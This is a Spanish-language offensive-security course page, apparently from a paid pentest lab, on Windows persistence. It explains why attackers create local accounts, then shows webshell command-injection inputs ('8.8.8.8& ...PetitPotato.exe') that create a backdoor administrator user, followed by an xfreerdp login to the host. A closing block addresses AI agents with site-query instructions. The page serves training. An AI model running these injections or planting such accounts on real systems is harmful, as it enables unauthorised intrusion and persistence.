# Creacion de usuarios con net

{% hint style="info" %}
Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: <https://wa.link/j265a0>. ¡Te esperamos para empezar este viaje juntos!
{% endhint %}

{% hint style="success" %}
**OBJETIVO DEL EJERCICIO #5:**

Crear un usuario local y agregarlo en el grupo de administratores locales con net.\
Para realizarlo es suficiente tener encendido UNICAMENTE `WEBSERVER` y `First-DC`.
{% endhint %}

Teniendo en cuenta que tenemos una webshell y podemos ejecutar comandos como NT Authority System, vamos a crear un usuario local y lo añadimos al grupo de administradores locales:

El comando `net` en sistemas Windows es una herramienta versátil que proporciona capacidades para gestionar usuarios, grupos y recursos compartidos, entre otros. Un atacante puede utilizar el comando `net` para crear usuarios por varias razones:

1. <mark style="color:red;">**Persistencia**</mark><mark style="color:red;">:</mark> Crear un nuevo usuario le permite al atacante tener una forma de acceder al sistema incluso si su acceso inicial se ve comprometido o revocado. Al establecer una cuenta adicional, el atacante puede regresar al sistema utilizando estas credenciales.
2. <mark style="color:red;">**Elevación de privilegios**</mark><mark style="color:red;">:</mark> Si un atacante ha ganado acceso a una máquina con privilegios elevados (por ejemplo, como administrador), puede crear un usuario y asignarle derechos administrativos, lo que le permite realizar tareas con privilegios elevados en el futuro.
3. <mark style="color:red;">**Movimiento lateral**</mark><mark style="color:red;">:</mark> Una vez que se ha creado una cuenta en una máquina, el atacante puede intentar utilizarla para acceder a otras máquinas dentro de la misma red, especialmente si se utilizan políticas de contraseñas débiles o si hay una falta de segregación de red adecuada.
4. <mark style="color:red;">**Acceso a recursos**</mark><mark style="color:red;">:</mark> Al crear un nuevo usuario, el atacante puede otorgar a esa cuenta específicos permisos o accesos a recursos, como archivos o directorios, que de otro modo estarían restringidos.
5. <mark style="color:red;">**Ocultar actividad**</mark><mark style="color:red;">:</mark> En lugar de comprometer y usar una cuenta existente, crear una nueva puede ayudar al atacante a evitar ser detectado. Las acciones realizadas por una cuenta de usuario recién creada pueden no generar el mismo nivel de sospecha inmediata que las acciones realizadas por una cuenta existente que de repente muestra un comportamiento atípico.
6. <mark style="color:red;">**Facilitar actividades adicionales**</mark><mark style="color:red;">:</mark> Al tener una cuenta bajo su control, un atacante puede configurar servicios, tareas programadas o aplicaciones para que se ejecuten bajo el contexto de ese usuario, asegurando que estas actividades tengan los permisos necesarios para operar.

Vamos a ejecutar los siguientes comandos desde nuestra webshell:

```bash
8.8.8.8& C:\Users\Public\PetitPotato.exe 3 "net user gerh P4ssw0rd /add"
```

La pagina retornara lo siguiente:

<figure><img src="/files/LEe2JWlmRH39ivpWyHKj" alt=""><figcaption></figcaption></figure>

Ahora vamos a darle super poderes a este usuario:

{% code overflow="wrap" %}

```
8.8.8.8& C:\Users\Public\PetitPotato.exe 3 "net localgroup Administrators gerh /add"
```

{% endcode %}

Y luego saldra lo siguiente:

<figure><img src="/files/emFwXOwPXxQuitUPxaOO" alt=""><figcaption></figcaption></figure>

Nosotros podemos validar, si lo anterior fue exitoso por medio del siguiente comando:

```bash
8.8.8.8& C:\Users\Public\PetitPotato.exe 3 "net user gerh"
```

<figure><img src="/files/E2zqLdkoWfKkNAwKcfYL" alt=""><figcaption></figcaption></figure>

Y despues de lo anterior, vamos a intentar conectarnos por RDP ya que este puerto fue localizado al inicio de la auditoria [Enumeracion sobre un servidor web desplegado en IIS](/cpad/introduccion-al-hacking-web/enumeracion-sobre-un-servidor-web-desplegado-en-iis.md)

<figure><img src="/files/4X4FzuXDrfHbtOVfaX02" alt=""><figcaption></figcaption></figure>

Y proporcionamos las credenciales:

<figure><img src="/files/RitX1kPF6UP9HeadwZK4" alt=""><figcaption></figcaption></figure>

Y despues obtendremos una sesion de RDP:

<figure><img src="/files/munUOrtCzGaV4yx7NPxp" alt=""><figcaption></figcaption></figure>

Tambien podriamos obtenerla por medio de Kali Linux asi:

{% code overflow="wrap" %}

```bash
xfreerdp /u:"gerh" /p:"P4ssw0rd" /v:3.133.16.165 -wallpaper +clipboard /dynamic-resolution +window-drag
```

{% endcode %}

<figure><img src="/files/W4XktLbjRBgPDH3v1bh7" alt=""><figcaption></figcaption></figure>

Luego de presionar Y:

<figure><img src="/files/oGH23BGqCMsSJU61T76c" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://books.spartan-cybersec.com/cpad/persistencia-en-windows-local/creacion-de-usuarios-con-net.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
